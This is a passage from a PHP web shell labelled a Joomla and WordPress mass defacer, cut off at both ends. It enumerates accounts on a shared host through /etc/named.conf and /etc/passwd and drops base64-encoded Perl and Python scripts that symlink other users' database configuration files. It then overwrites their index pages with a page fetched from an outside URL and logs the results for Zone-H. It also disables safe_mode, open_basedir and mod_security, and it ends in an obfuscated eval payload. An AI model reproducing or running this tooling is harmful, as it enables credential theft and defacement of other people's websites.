1503. $dd = 'PD9waHANCiRkZWYgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3pvbmVobWlycm9ycy5uZXQvZGVmYWNlZC8yMDEzLzAxLzEzL2JhbHRzdHVkaW8ubHQvaW5kZXguaHRtbCcpOw0KJHAgPSBleHBsb2RlKCdwdWJsaWNfaHRtbCcsZGlybmFtZShfX0ZJTEVfXykpOw0KJHAgPSAkcFswXS4ncHVibGljX2h0bWwnOw0KaWYgKCRoYW5kbGUgPSBvcGVuZGlyKCRwKSkgew0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5odG1sJywndysnKTsNCiAgICBAZndyaXRlKCRmcDEsICRkZWYpOw0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5waHAnLCd3KycpOw0KICAgIEBmd3JpdGUoJGZwMSwgJGRlZik7DQogICAgJGZwMSA9IEBmb3BlbigkcC4nL2luZGV4Lmh0bScsJ3crJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICBlY2hvICdEb25lJzsNCn0NCmNsb3NlZGlyKCRoYW5kbGUpOw0KdW5saW5rKF9fRklMRV9fKTsNCj8+';
1504. $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';
1505. $output = fopen('defaced.html', 'a+');
1506. $_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;
1507. $_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;
1508. echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
1509. $j = 1;
1510. $st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;
1511. for($i = $st; $i <= $numero_dominios; $i++)
1512. {
1513. $domain = $out[1][$i];
1514. $dono_arquivo = @fileowner("/etc/valiases/".$domain);
1515. $infos = @posix_getpwuid($dono_arquivo);
1516.  
1517. if($infos['name']!='root') {
1518. $config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");
1519. $config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");
1520. $config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");
1521.  
1522. $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
1523.  
1524. if($config01 && preg_match('/dbprefix/i',$config01)){
1525. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
1526. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
1527. $res = index_changer_joomla($config01, $def, $domain);
1528. echo '<td>'.$res['output'].'</td>';
1529. if($res['cond']) {
1530. echo '<td align="center"><span class="green">DEFACED</span></td>';
1531. fwrite($output, 'http://'.$domain."<br>");
1532. $_SESSION['count1'] = $_SESSION['count1'] + 1;
1533. } else {
1534. echo '<td align="center"><span class="red">FAILED</span></td>';
1535. }
1536. echo '</tr>';
1537. }
1538.  
1539. if($config02 && preg_match('/DB_NAME/i',$config02)){
1540. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
1541. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
1542. $res = index_changer_wp($config02, $dd);
1543. echo '<td>'.$res['output'].'</td>';
1544. if($res['cond']) {
1545. echo '<td align="center"><span class="green">DEFACED</span></td>';
1546. fwrite($output, 'http://'.$domain."<br>");
1547. $_SESSION['count2'] = $_SESSION['count2'] + 1;
1548. } else {
1549. echo '<td align="center"><span class="red">FAILED</span></td>';
1550. }
1551. echo '</tr>';
1552. }
1553. $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
1554. if($config03 && preg_match('/DB_NAME/i',$config03)){
1555. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
1556. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
1557. $res = index_changer_wp($config03, $dd);
1558. echo '<td>'.$res['output'].'</td>';
1559. if($res['cond']) {
1560. echo '<td align="center"><span class="green">DEFACED</span></td>';
1561. fwrite($output, 'http://'.$domain."<br>");
1562. $_SESSION['count2'] = $_SESSION['count2'] + 1;
1563. } else {
1564. echo '<td align="center"><span class="red">FAILED</span></td>';
1565. }
1566. echo '</tr>';
1567. }
1568. }
1569. }
1570. echo '</table>';
1571. echo '<hr/>';
1572. echo 'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')<br />';
1573. echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
1574. if($_SESSION['count1']+$_SESSION['count2'] > 0){
1575. echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
1576. }
1577. }
1578. function exec_mode_2($def_url) {
1579.  
1580. $domains = @file_get_contents("/etc/named.conf");
1581. @preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
1582. $out = array_unique($out[1]);
1583. $num = count($out);
1584. print("Total domains: $num<br><br />");
1585.  
1586. $def = file_get_contents($def_url);
1587. $def = urlencode($def);
1588.  
1589. $output = fopen('defaced.html', 'a+');
1590. $defaced = '';
1591. $count1 = 0;
1592. $count2 = 0;
1593. echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
1594. $j = 1;
1595. $map = array();
1596. foreach($out as $d) {
1597. $info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
1598. $map[$info['name']] = $d;
1599. }
1600. $dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs
1601. NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2
1602. h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od
1603. G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
1604. YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d
1605. kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC
1606. B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';
1607. mkdir('plsym',0777);
1608. file_put_contents('plsym/plsym.cc', base64_decode($dt));
1609. chmod('plsym/plsym.cc', 0755);
1610. $wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";
1611. $fp = @fopen ('plsym/.htaccess','w');
1612. fwrite($fp, $wr);
1613. fclose($fp);
1614. $res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');
1615.  
1616. $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
1617. unlink('plsym/plsym.cc');
1618. $data = file_get_contents($url);
1619. preg_match_all('/<a href="(.+)">/', $data, $match);
1620. unset($match[1][0]);
1621. $i = 1;
1622. foreach($match[1] as $m)
1623. {
1624. $mz = explode('##',urldecode($m));
1625. $config01 = '';
1626. $config02 = '';
1627. if($mz[1] == 'joomla.txt') {
1628. $config01 = file_get_contents($url.$m);
1629. }
1630. if($mz[1] == 'wordpress.txt') {
1631. $config02 = file_get_contents($url.$m);
1632. }
1633. $domain = $map[$mz[0]];
1634. $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
1635.  
1636. if($config01 && preg_match('/dbprefix/i',$config01)){
1637. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i++.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
1638. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
1639. $res = index_changer_joomla($config01, $def, $domain);
1640. echo '<td>'.$res['output'].'</td>';
1641. if($res['cond']) {
1642. echo '<td align="center"><span class="green">DEFACED</span></td>';
1643. fwrite($output, 'http://'.$domain."<br>");
1644. $count1++;
1645. } else {
1646. echo '<td align="center"><span class="red">FAILED</span></td>';
1647. }
1648. echo '</tr>';
1649. }
1650.  
1651. if($config02 && preg_match('/DB_NAME/i',$config02)){
1652. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
1653. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
1654. $res = index_changer_wp($config02, $def);
1655. echo '<td>'.$res['output'].'</td>';
1656. if($res['cond']) {
1657. echo '<td align="center"><span class="green">DEFACED</span></td>';
1658. fwrite($output, 'http://'.$domain."<br>");
1659. $count2++;
1660. } else {
1661. echo '<td align="center"><span class="red">FAILED</span></td>';
1662. }
1663. echo '</tr>';
1664. }
1665. }
1666. echo '</table>';
1667. echo '<hr/>';
1668. echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
1669. echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
1670. if($count1+$count2 > 0){
1671. echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
1672. }
1673. }
1674.  
1675. function exec_mode_3($def_url) {
1676.  
1677. $domains = @file_get_contents("/etc/named.conf");
1678. @preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
1679. $out = array_unique($out[1]);
1680. $num = count($out);
1681. print("Total domains: $num<br><br />");
1682.  
1683. $def = file_get_contents($def_url);
1684. $def = urlencode($def);
1685.  
1686. $output = fopen('defaced.html', 'a+');
1687. $defaced = '';
1688. $count1 = 0;
1689. $count2 = 0;
1690. echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
1691. $j = 1;
1692. $map = array();
1693. foreach($out as $d) {
1694. $info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
1695. $map[$info['name']] = $d;
1696. }
1697. $dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHd
1698. kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH
1699. VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL
1700. 3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
1701. cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl
1702. MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC
1703. R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';
1704. mkdir('plsym',0777);
1705. file_put_contents('plsym/data.txt', $_POST['man_data']);
1706. file_put_contents('plsym/plsym.cc', base64_decode($dt));
1707. chmod('plsym/plsym.cc', 0755);
1708. $wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";
1709. $fp = @fopen ('plsym/.htaccess','w');
1710. fwrite($fp, $wr);
1711. fclose($fp);
1712. $res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');
1713.  
1714. $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
1715. unlink('plsym/plsym.cc');
1716. $data = file_get_contents($url);
1717. preg_match_all('/<a href="(.+)">/', $data, $match);
1718. unset($match[1][0]);
1719. $i=1;
1720. foreach($match[1] as $m)
1721. {
1722. $mz = explode('##',urldecode($m));
1723. $config01 = '';
1724. $config02 = '';
1725. if($mz[1] == 'joomla.txt') {
1726. $config01 = file_get_contents($url.$m);
1727. }
1728. if($mz[1] == 'wordpress.txt') {
1729. $config02 = file_get_contents($url.$m);
1730. }
1731. $domain = $map[$mz[0]];
1732. $cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
1733.  
1734. if($config01 && preg_match('/dbprefix/i',$config01)){
1735. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.($i++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
1736. echo '<td align="center"><font color="pink">JOOMLA</font></td>';
1737. $res = index_changer_joomla($config01, $def, $domain);
1738. echo '<td>'.$res['output'].'</td>';
1739. if($res['cond']) {
1740. echo '<td align="center"><span class="green">DEFACED</span></td>';
1741. fwrite($output, 'http://'.$domain."<br>");
1742. $count1++;
1743. } else {
1744. echo '<td align="center"><span class="red">FAILED</span></td>';
1745. }
1746. echo '</tr>';
1747. }
1748.  
1749. if($config02 && preg_match('/DB_NAME/i',$config02)){
1750. echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
1751. echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
1752. $res = index_changer_wp($config02, $def);
1753. echo '<td>'.$res['output'].'</td>';
1754. if($res['cond']) {
1755. echo '<td align="center"><span class="green">DEFACED</span></td>';
1756. fwrite($output, 'http://'.$domain."<br>");
1757. $count2++;
1758. } else {
1759. echo '<td align="center"><span class="red">FAILED</span></td>';
1760. }
1761. echo '</tr>';
1762. }
1763. }
1764. echo '</table>';
1765. echo '<hr/>';
1766. echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
1767. echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
1768. if($count1+$count2 > 0){
1769. echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
1770. }
1771. }
1772. echo '<!DOCTYPE html>
1773. <html>
1774. <head>
1775. <title>Joomla ~ Wordpress Mass Defacer</title>
1776. <link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css">
1777. <style type="text/css">
1778. table,body {
1779. background:
1780. url("http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG") repeat ,
1781. url("http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG") no-repeat center top,top left,top right,
1782. url("https://d33ds.co/img/bg2.png") repeat top left;
1783. background-color: #ffffff;
1784. color:white;
1785. font-family: "Trebuchet MS",Arial;background-attachment:fixed;margin:0;padding:0;}
1786. .header {position:fixed;width:100%;top:0;background:#000;}
1787. .footer {position:fixed;width:100%;bottom:0;background:#000;}
1788. input[type="submit"]{background-color:rgba(25,25,25,0.6);border:1; padding:2px; border-bottom:2px solid white; font-size:25px;font-family:orbitron; color:red;border:2px solid white;margin:4px 4px 8px 0;}
1789. input[type="submit"]:hover{color:SeaShell;}
1790. input[type="text"]:hover{color:SeaShell;}
1791. input[type="radio"]{margin-top: 0;}
1792. .td2 {border-left:1px solid red;border-radius: 2px 2px 2px 2px;}
1793. input[type="text"] {background:#111111; border:1; padding:2px; border-bottom:2px solid #393939;font-family:orbitron; font-size:25px; color:#ffffff;border:2px solid #4C83AF;margin:4px 4px 8px 0;}
1794. .even {background-color: rgba(25, 25, 25, 0.6);}
1795. .odd {background-color: rgba(102, 102, 102, 0.6);}
1796. a {color:#fff;} a:hover {color:#00BFFF;}
1797. fieldset{border: 1px solid grey; background: rgba(0,0,0,0.7); width: 600px; margin: 0 auto;min-height:240px;}
1798. textarea{background: rgba(0,0,0,0.6); color: white;}
1799. .green {color:#00FF00;font-weight:bold;}
1800. .red {color:#FF0000;font-weight:bold;}
1801. .killme {position: fixed; top: 20px; right: 20px; border: 2px solid yellow; padding: 10px; font-size: 20px; color: red; font-weight: bold;}
1802. </style>
1803. <script type="text/javascript">
1804. function change() {
1805. if(document.getElementById(\'rcd\').checked == true) {
1806. document.getElementById(\'tra\').style.display = \'\';
1807. } else {
1808. document.getElementById(\'tra\').style.display = \'none\';
1809. }
1810. }
1811. function hide() {
1812. document.getElementById(\'tra\').style.display = \'none\';
1813. }
1814. </script>
1815. </head>
1816. <body>
1817. <h2 style="color:#00ff00;text-align: center;font-family:orbitron;text-shadow: 6px 6px 6px black;">Wordpress and Joomla Mass Defacer</h2>';
1818. if(!isset($_POST['form_action']) && !isset($_GET['zh']) && !isset($_GET['mode']) && !isset($_GET['kill'])){
1819. echo '<div align="center">
1820. <form action="" method="post">
1821. <table>
1822. <tr><td><input type="radio" value="1" name="mode" checked="checked" onclick="hide();"></td><td>using /etc/named.conf ('.(is_readable('/etc/named.conf')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr>
1823. <tr><td><input type="radio" value="2" name="mode" onclick="hide();"></td><td>using /etc/passwd ('.(is_readable('/etc/passwd')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr>
1824. <tr><td><input type="radio" value="2" name="mode" id="rcd" onclick="change();"></td><td>manual copy of /etc/passwd</td></tr>
1825. <tr id="tra" style="display: none;"><td></td><td><textarea cols="40" rows="5" name="man_data"></textarea></td></tr>
1826. </table>
1827. <br />
1828. <input type="hidden" name="form_action" value="1">
1829. <table>
1830. <tr><td><b>index url: </b><input size="35" type="text" name="defpage" value="http://wget.yu.tl/files/lol.css"></tr></td>
1831. </table>
1832. <input class=submit type="submit" value="Attack !" name="Submit">
1833. </form>';
1834. }
1835. $milaf_el_index = $_POST['defpage'];
1836. if($_POST['form_action'] == 1) {
1837. if($_POST['mode']==1) { exec_mode_1($milaf_el_index, $hacker); }
1838. if($_POST['mode']==2) { exec_mode_2($milaf_el_index); }
1839. if($_POST['mode']==3) { exec_mode_3($milaf_el_index); }
1840. }
1841. if($_GET['mode']==1) { exec_mode_1($milaf_el_index); }
1842. echo '</body>
1843. </html>'; }
1844. if($_POST['azzatssins2']){
1845. //$us = file_get_contents("/etc/passwd");
1846. $usa = fopen('/etc/passwd','r');
1847. $dir = mkdir('jmp', 0777);
1848. $rrrr = "Options all \n DirectoryIndex jump \n Require None \n Satisfy Any";
1849. $frr = fopen('jmp/.htaccess', 'w');
1850. fwrite($frr, $rrrr);
1851. while($us = fgets($usa)){
1852. if($us==""){
1853. echo "<font color=red>can't read /etc/passwd</font>";
1854. }
1855. else{
1856. preg_match_all('/(.*?):x:/', $us, $user_byk);
1857. foreach($user_byk[1] as $user){
1858. $dir1 = "/home/$user/public_html/";
1859. if(is_readable($dir1)){
1860. echo "<font color=lime>[+]</font> <font color=green><b><i><font color='lime'>$dir1</i></b></font><br>"; }
1861. else{
1862. }
1863. }
1864. }
1865.  
1866. }}
1867. if($_POST['azzatssins3']){
1868. $py =base64_decode('Iy8qUHl0aG9uDQoNCmltcG9ydCB0aW1lDQppbXBvcnQgb3MNCmltcG9ydCBzeXMNCmltcG9ydCByZQ0KDQpvcy5zeXN0ZW0oImNvbG9yIEMiKQ0KDQpodGEgPSAiXG5GaWxlIDogLmh0YWNjZXNzIC8vIENyZWF0ZWQgU3VjY2Vzc2Z1bGx5IVxuIg0KZiA9ICJBbGwgUHJvY2Vzc2VzIERvbmUhXG5TeW1saW5rIEJ5cGFzc2VkIFN1Y2Nlc3NmdWxseSFcbiINCg0Kb3MubWFrZWRpcnMoJ3NsJykNCm9zLmNoZGlyKCdzbCcpDQoNCnN1c3I9W10NCnNpdGV4PVtdDQpvcy5zeXN0ZW0oImxuIC1zIC8gQVpaQVRTU0lOUyIpDQoNCmggPSAiT3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzXG5EaXJlY3RvcnlJbmRleCBzbFxuQWRkVHlwZSB0ZXh0L3BsYWluIC5waHBcbkFkZFR5cGUgdHh0IC5waHBcbkFkZEhhbmRsZXIgdHh0IC5waHAiDQptID0gb3BlbigiLmh0YWNjZXNzIiwidysiKQ0KbS53cml0ZShoKQ0KbS5jbG9zZSgpDQpwcmludCBodGENCg0Kc2YgPSAiPHRpdGxlPlN5bWJvbGljIExpbmtzPC90aXRsZT48Ym9keSBiZ2NvbG9yPWJsYWNrPjxjZW50ZXI+PGJyPjxkaXYgc3R5bGU9YmFja2dyb3VuZDptYXJvb247bWFyZ2luOjBweDtwYWRkaW5nOjRweDt0ZXh0LWFsaWduOmNlbnRlcjtjb2xvcjpzaWx2ZXI7PjxpPjxmb250IGNvbG9yPWxpbWU+JmNvcHk7IDwvZm9udD48YSBocmVmPW1haWx0bzpjeWJlcnNlcmtlcnNAZ21haWwuY29tPkFaWkFUU1NJTlMgQ1lCRVJTRVJLRVJTPC9hPjwvaT48YnI+PGJyPjxicj48L2NlbnRlcj4iDQoNCm8gPSBvcGVuKCcvZXRjL3Bhc3N3ZCcsJ3InKQ0Kbz1vLnJlYWQoKQ0KbyA9IHJlLmZpbmRhbGwoJy9ob21lL1x3KycsbykNCg0KZm9yIHh1c3IgaW4gbzoNCgl4dXNyPXh1c3IucmVwbGFjZSgnL2hvbWUvJywnJykNCglzdXNyLmFwcGVuZCh4dXNyKQ0KcHJpbnQgIi0iKjMwDQp4c2l0ZSA9IG9zLmxpc3RkaXIoIi92YXIvbmFtZWQiKQ0KDQpmb3IgeHhzaXRlIGluIHhzaXRlOg0KCXh4c2l0ZT14eHNpdGUucmVwbGFjZSgiLmRiIiwiIikNCglzaXRleC5hcHBlbmQoeHhzaXRlKQ0KcHJpbnQgZg0KcGF0aD1vcy5nZXRjd2QoKQ0KaWYgIi9wdWJsaWNfaHRtbC8iIGluIHBhdGg6DQoJcGF0aD0iL3B1YmxpY19odG1sLyINCmVsc2U6DQoJcGF0aCA9ICIvaHRtbC8iDQpjb3VudGVyPTENCmlwcz1vcGVuKCJzeW1saW5rLmh0bSIsInciKQ0KaXBzLndyaXRlKHNmKQ0KDQpmb3IgZnVzciBpbiBzdXNyOg0KCWZvciBmc2l0ZSBpbiBzaXRleDoNCgkJZnU9ZnVzclswOjVdDQoJCXM9ZnNpdGVbMDo1XQ0KCQlpZiBmdT09czoNCgkJCWlwcy53cml0ZSgiPGJyPjxicj48Y2VudGVyPjxicj48ZGl2IHN0eWxlPWJhY2tncm91bmQ6dmlvbGV0O21hcmdpbjowcHg7cGFkZGluZzo1cHg7dGV4dC1hbGlnbjpjZW50ZXI7Y29sb3I6d2hpdGU7PjxiPjxpPjxmb250IGNvbG9yPXNpbHZlcj48Zm9udCBjb2xvcj1saW1lPiVzPC9mb250PiB8IDxmb250IGNvbG9yPW9yYW5nZT4lczwvZm9udD4gfCA8YSBocmVmPUFaWkFUU1NJTlMvaG9tZS8lcyVzIHRhcmdldD1fYmxhbmsgPiVzPC9hPjwvZm9udD48L2k+PC9iPjwvZGl2PjwvY2VudGVyPiIlKGNvdW50ZXIsZnVzcixmdXNyLHBhdGgsZnNpdGUpKQ0KCQkJY291bnRlcj1jb3VudGVyKzE=');
1869. $pys = fopen("symlink.py","w+");
1870. fwrite($pys,$py);
1871. system('python symlink.py');
1872. system('rm symlink.py');
1873. echo'<meta http-equiv="Refresh" content= "0; url=sl/symlink.htm">';
1874. }
1875. if($_POST['azzatssins4']){
1876. @session_start();
1877. @set_time_limit(0);
1878. @ini_set('max_execution_time',0);
1879. @mkdir('xazs',0777);
1880. $sempak = "Options all <br>
1881. DirectoryIndex azzatssins.html <br>
1882. AddType text/plain .php <br>
1883. AddHandler server-parsed .php <br>
1884. AddType text/plain .html <br>
1885. AddHandler txt .html <br>
1886. Require None <br>
1887. Satisfy Any";
1888. $masuk =@fopen ('xazs/.htaccess','w');
1889. fwrite($masuk ,$sempak);
1890. @symlink('/','xazs/azzatssins.txt');
1891. $pg = basename(__FILE__);
1892.  
1893.  
1894. if(is_readable("/var/named")){
1895. echo"<title>Symlink</title><body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>";
1896. echo '<table align="center" border="3" width="400" cellspacing="0" cellpadding="0">
1897. <td align="center"> <font color="white"> <b>_DOMAINS_</b></td>
1898. <td align="center"> <font color="white"> <b>_USERS_</b></td>
1899. <td align="center"> <font color="white"> <b>_SYMLINK_</b></center></td>';
1900. $list = scandir("/var/named");
1901. foreach($list as $domain){
1902. if(strpos($domain,".db")){
1903. @error_reporting(0);
1904. @ini_set('log_errors',0);
1905. @ini_set('error_log',NULL);
1906.  
1907. $i += 1;
1908. $domain = str_replace('.db','',$domain);
1909. $owner = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
1910. echo "<tr>
1911. <td><a class='azzatssins' href='http://".$domain." '>".$domain."</a></td>
1912. <td align='center'><font color='white'>".$owner['name']."</td>
1913. <td align='center'><a href='xazs/azzatssins.txt".$owner['dir']."/public_html/' target='_blank'>Symlink</a></td>";
1914. }
1915. }
1916. flush();
1917. flush();
1918. }
1919. echo "</tr></table></div></html>";
1920. }
1921. if($_POST['azzatssins5']){
1922. echo ini_get("safe_mode");
1923. echo ini_get("open_basedir");
1924. ini_restore("safe_mode");
1925. ini_restore("open_basedir"); $phi = fopen("php.ini","w+");
1926. fwrite($phi,"safe_mode = Off
1927. disable_functions = NONE
1928. safe_mode_gid = OFF
1929. open_basedir = OFF ");$phii = fopen(".htaccess","w+");
1930. fwrite($phii,"<IfModule mod_security.c>
1931. KillFilterEngine Off
1932. KillFilterScanPOST Off
1933. KillFilterCheckURLEncoding Off
1934. KillFilterCheckUnicodeEncoding Off
1935. </IfModule>
1936. "); }
1937. if($_POST['azzatssins6']){
1938. $mys =base64_decode('PD9waHAgZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZU5yTlBXdFhHN21TbjJmT21mK2c5UGltN2NFWW16eXZqWjJRUUdZNFE0QUw1TjZkeFY1djIyNURMM2EzMDkwT01CbisrOVpEcjM2WVFKTGRjK2NCTGFsVUpaV2tVbFdwSkg3NjBZL2pLQjdHL2lLSzB5QThyNzZvZFg3NjhYWGlwOE81ZHg2TWh4K1hVZW9udzNnWnBzSGNyemF4T0JvTms5U0wweW9tS25Nc0VGM2hYeTltMGNTdnVzS3RpM2t3amlPcVVTTWdncGVBWE9Pc05SQnI2cnM1QUtDSlB3MUNxSCt5UFR3K1BEd0ZMRWxLVFp0NVk4anU5eUhIM1lBZmt5QU9QVUE5SEw3YjI5OGREbXUxQnVRam5ZME5oV1R2WlBpdnZRUEdBZjlWajM0N0doNmVBQUxNcllsWG9pWGFvaWxxRmwxZFpXZnZlUGZ0NmVIeEg4T1QzYVB0NDIzNEZOMnV3QmJrNE44ZXZnZjQ4Y3hMa3FGL0hTUnBVblV4YnlXQlg0L2VRb1h6UEh2UEYyUEpxRW1RREtmTGNBeDhRcWp4OUh6NHlZdXJMdVI3bzVsUFpXa1FoVW0rS2REQnZZTjNoNEM5K3NpUC9mT2c2aXd1RmtFNGpaeTZ4bHJMTm96R0dRZGdPQXZtUWNxais5T1AweWoydmZGRjFZdGo3NmJxRG4vZGhjRndoMGVISjZmUU15OFJGUmlWajBzL1NXdmlzd0d2Nkd5R3VmUnZSTGNISDUrODJkSW4wR0FxcWxUd3VYa3JIZ0ZMaDY3T1orNVFVbFlCSGlSRGJvUkNBdTI3aFhLSlhPSG1YUDVQRWhsZmVESDBqc1p0bVU1Zk1wMEwzNXY0Y2RVWlIySHFoK242NmMzQ2I0dlV2MDQzTHRMNXJDTmt0UzVVV1gvcEVEbmh6eEsvZ0hNVW5EOTdJRTZzY2hmSzg5SGxBekZDamJzUXpqeFkwcTBINGd5U2FQM2x5MmQvWDk5MEpMZHgr